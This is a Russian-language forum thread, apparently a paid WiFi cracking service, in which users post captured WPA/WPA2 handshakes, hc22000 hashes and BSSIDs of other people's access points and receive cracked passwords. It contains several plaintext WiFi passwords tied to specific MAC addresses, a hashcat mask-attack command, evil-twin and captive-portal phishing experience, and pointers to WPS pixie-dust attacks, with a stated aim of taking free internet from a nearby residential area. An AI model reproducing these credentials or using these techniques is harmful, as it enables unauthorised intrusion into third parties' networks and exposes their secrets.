(ПЛАТНО) Взлом паролей WiFi (wpa/wpa2) Handshake

[zdestuta]

Привет, добрые люди!

https://transfiles.ru/nfhfe - три точки доступа влёгкую поймал хэндшейки, но видюха у меня карайне слаба rx550. по ссылке и pcap и готовые hc22000 файлки для hashcat сделанные из pcap с помощью hcxpcapngtool'a

Заранее спасибо!

P.S. К сожaлению на этот раз "шалость не удалась" с evil twin + captive portal (обычно прокатывало, даже на себе тестил сначала - технически работает точно, ну может в плане СИ "подозрительно" только) так как клиенты в сетках походу M2M - роботы там, не люди, только девайсы в общем в клиентах - не понимают они captive portal и не лезут на него в общем

 

[Andrey9999]

Привет, добрые люди!

https://transfiles.ru/nfhfe - три точки доступа влёгкую поймал хэндшейки, но видюха у меня карайне слаба rx550. по ссылке и pcap и готовые hc22000 файлки для hashcat сделанные из pcap с помощью hcxpcapngtool'a

Заранее спасибо!

P.S. К сожaлению на этот раз "шалость не удалась" с evil twin + captive portal (обычно прокатывало, даже на себе тестил сначала - технически работает точно, ну может в плане СИ "подозрительно" только) так как клиенты в сетках походу M2M - роботы там, не люди, только девайсы в общем в клиентах - не понимают они captive portal и не лезут на него в общем

TP-Link_F254 1c:3b:f3:ac:f2:54: 54730199

 

[zdestuta]

TP-Link_F254 1c:3b:f3:ac:f2:54: 54730199

Спасибо!!!
Потрясающе быстро!

А обычно чем брутите, на чём, и какой словарь? (если не секрет)

Впредь буду стараться пробовать номерные 8-и значные пароли сам, а то даже прям стыдно что Вас побеспокоил.

UPD: да, тут повезло именно у этой точки пароль оказался из 8 цифр, удивительно! но только у одной из 3-х точек доступа такое.
hashcat -m 22000 -a 3 -w 3 ./file_with_hashes.txt '?d?d?d?d?d?d?d?d'
весь перебор работает ~9 минут max при хэшрейте ~180 kH/s

 

[HashCr4cker]

Всем привет
ESSID: DIR-300
BSSID: FC_8B_97_74_EA_02
Handshake: https://transfiles.ru/86jzf

P.S. пароль точно не 8 цифр

DIR-300:523149999

 

[174region174]

Спасибо!!!
Потрясающе быстро!

А обычно чем брутите, на чём, и какой словарь? (если не секрет)

Впредь буду стараться пробовать номерные 8-и значные пароли сам, а то даже прям стыдно что Вас побеспокоил.

UPD: да, тут повезло именно у этой точки пароль оказался из 8 цифр, удивительно! но только у одной из 3-х точек доступа такое.
hashcat -m 22000 -a 3 -w 3 ./file_with_hashes.txt '?d?d?d?d?d?d?d?d'
весь перебор работает ~9 минут max при хэшрейте ~180 kH/s

Ничего страшного. Можешь сюда кидать.
У многих тут 8 цифр перебирается меньше минуты. )))

 

[174region174]

за счет чего достигаются такие результаты, настолько мощные видеокарты? у меня geforce 1050ti 8 цифр перебирает за ~20 мин

За счёт количества и более мощных видеокарт.
Вот тут тесты некоторых пользователей по скоростям WPA

Post Your GPU Benchmarks for WPA

Anyone got the AMD RX 7900 XT and XTX WPA speeds? Also updated my GPU speed comparison text above with this. Worth reading! "Another note is the GPUs run a lot cooler when reducing the POWER (obviously). Much better way to run jobs I think. More efficient and cooler. I never run at 100% POWER...

forum.hashkiller.io

 

[Andrey9999]

например 1080ti ~2 минуты перебирает

 

[Chepux]

ESSID: TPLink01D
BSSID: 60-A4-B7-40-A0-1D

ESSID:fh4ddb80
BSSID:58-AE-F1-4D-DB-80

 

[Andrey9999]

ESSIDPLink01D
BSSID: 60-A4-B7-40-A0-1D

ESSID:fh4ddb80
BSSID:58-AE-F1-4D-DB-80

TP-Link_A01D: 80080329

 

[Chepux]

это чего такое ?

: T если слитно написать, то переводит в эмодзи. Исправил

 

[Andrey9999]

ХШ сразу не было...

 

[Andrey9999]

ESSID:fh4ddb80
BSSID:58-AE-F1-4D-DB-80

fh_4ddb80: wlanb2247f

 

[zdestuta]

WPA*02*67f4709805f73a466018d71d0c22902d*c8be198e8bae*661fba7b1a0d*4449522d363135*a93b49af00b0e2e7ee6757f3a7cc940719f2f2b55792c01cd0c8c0446c7ed63a*0103007502010a000000000000000000006381eeda630d75d3ecebc0f01860fdd8e7b749f7b988e911379dcdea0e93c6ec000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac028000*82
WPA*02*b63833dc42673a6adfc23f97f0f42204*f8f08257bc66*04f352f78843*4e6f766174656c65636f6d32303031*229f7307cc4d6f4323368148cb8df7c75c5b57bb8bed4830a2c8847ed96b8f4c*0103007502010a000000000000000000016b9fe60bb0f236e2d7626f13b11af843b9d5f323736cf8c4a0a7d87872bebf8d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*82
WPA*02*4b8b1958c2a804ad06d61578b70e932d*e865d4682dd1*b8876e98fa3e*706f6e6368696b*95b212a8cdfad1b9d8743a4e86803554911f683b5055d3d137cfe70bf0d431de*0103007502010a000000000000000000012d01f4b75df5afa2989e1552eb7bc5dfc5d12e63ec9135e60beef515cbf1d4d9000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*42
WPA*02*c69937fc6a73d4db26525980657b2647*c025e9059d24*38d57ae5d10f*54502d4c494e4b5f39443234*33ba929f7753dec51d7495e13cd1cde56f3dc7d95c9f68d7823143e278dd136d*0103007502010a000000000000000000010ebd2361583317d2d72233d372356c87b6a4e6a38e2c1812ca831bb8c738d1a8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac023c00*82

Товарищи, пожалуйста хоть что-нибудь из этих четырёх

 

[Andrey9999]

WPA*02*67f4709805f73a466018d71d0c22902d*c8be198e8bae*661fba7b1a0d*4449522d363135*a93b49af00b0e2e7ee6757f3a7cc940719f2f2b55792c01cd0c8c0446c7ed63a*0103007502010a000000000000000000006381eeda630d75d3ecebc0f01860fdd8e7b749f7b988e911379dcdea0e93c6ec000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac028000*82
WPA*02*b63833dc42673a6adfc23f97f0f42204*f8f08257bc66*04f352f78843*4e6f766174656c65636f6d32303031*229f7307cc4d6f4323368148cb8df7c75c5b57bb8bed4830a2c8847ed96b8f4c*0103007502010a000000000000000000016b9fe60bb0f236e2d7626f13b11af843b9d5f323736cf8c4a0a7d87872bebf8d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*82
WPA*02*4b8b1958c2a804ad06d61578b70e932d*e865d4682dd1*b8876e98fa3e*706f6e6368696b*95b212a8cdfad1b9d8743a4e86803554911f683b5055d3d137cfe70bf0d431de*0103007502010a000000000000000000012d01f4b75df5afa2989e1552eb7bc5dfc5d12e63ec9135e60beef515cbf1d4d9000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*42
WPA*02*c69937fc6a73d4db26525980657b2647*c025e9059d24*38d57ae5d10f*54502d4c494e4b5f39443234*33ba929f7753dec51d7495e13cd1cde56f3dc7d95c9f68d7823143e278dd136d*0103007502010a000000000000000000010ebd2361583317d2d72233d372356c87b6a4e6a38e2c1812ca831bb8c738d1a8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac023c00*82

Товарищи, пожалуйста хоть что-нибудь из этих четырёх

TP-LINK_9D24 c0:25:e9:05:9d:24 71388625
DIR-615 c8:be:19:8e:8b:ae 53892843
ponchik e8:65:d4:68:2d:d1 vladimir

 

[zdestuta]

TP-LINK_9D24 c0:25:e9:05:9d:24 71388625

Вау! Спасибо огромное!

 

[zdestuta]

TP-Link_F254 1c:3b:f3:ac:f2:54: 54730199
TP-LINK_9D24 c0:25:e9:05:9d:24 71388625

А вот интересно есть ли какая-нибудь логика в установке паролей (PSK) к таким точкам?

Регулярно наблюдаю их в нескольких локациях прям десятками, и это МТС похоже судя по "выходам" по IP.

ponchik/vladimir - старый добрый rockyou.txt ? ;-)

 

[Andrey9999]

TP-Link_F254 1c:3b:f3:ac:f2:54: 54730199
TP-LINK_9D24 c0:25:e9:05:9d:24 71388625

А вот интересно есть ли какая-нибудь логика в установке паролей (PSK) к таким точкам?

Регулярно наблюдаю их в нескольких локациях прям десятками, и это МТС похоже судя по "выходам" по IP.

ponchik/vladimir - старый добрый rockyou.txt ? ;-)

у тп-линков, чаще всего восемь цифр WPS оставляют...

 

[zdestuta]

у тп-линков, чаще всего восемь цифр WPS оставляют...

Спасибо! Не знал...
От меня эти AP "за килОметры" находятся но главное в LoS, а для перехвата 4WHS надо ведь чтобы и клиенты точек ещё ловились...
Вот интересно без клиентов (я думаю просто их "недобиваю" по дальности) AP как бы "поиметь" для интернету халявного реально? WPS атаки наверное надо пробовать типа pixie dust, а то брутфорсить 100M комбинаций путём попыток соединений мне кажется дохлый номер...
(я тут просто на НГ внезапно "очнулся в дерёвне", но в зоне видимости оказался какой-то жилой массив "островок цивилизации", а интернет нормальный охота, спасибо очень выручили!)

 

[Andrey9999]

а то брутфорсить 100M комбинаций путём попыток соединений мне кажется дохлый номер...

там не нужен полный перебор)
хотя, на нормальной карте можно и все за ~две минуты перебрать)

 

[Andrey9999]

WPS атаки наверное надо пробовать типа pixie

да, что-то такое - oneshot например
но не все точки сейчас по WPS можно вскрыть...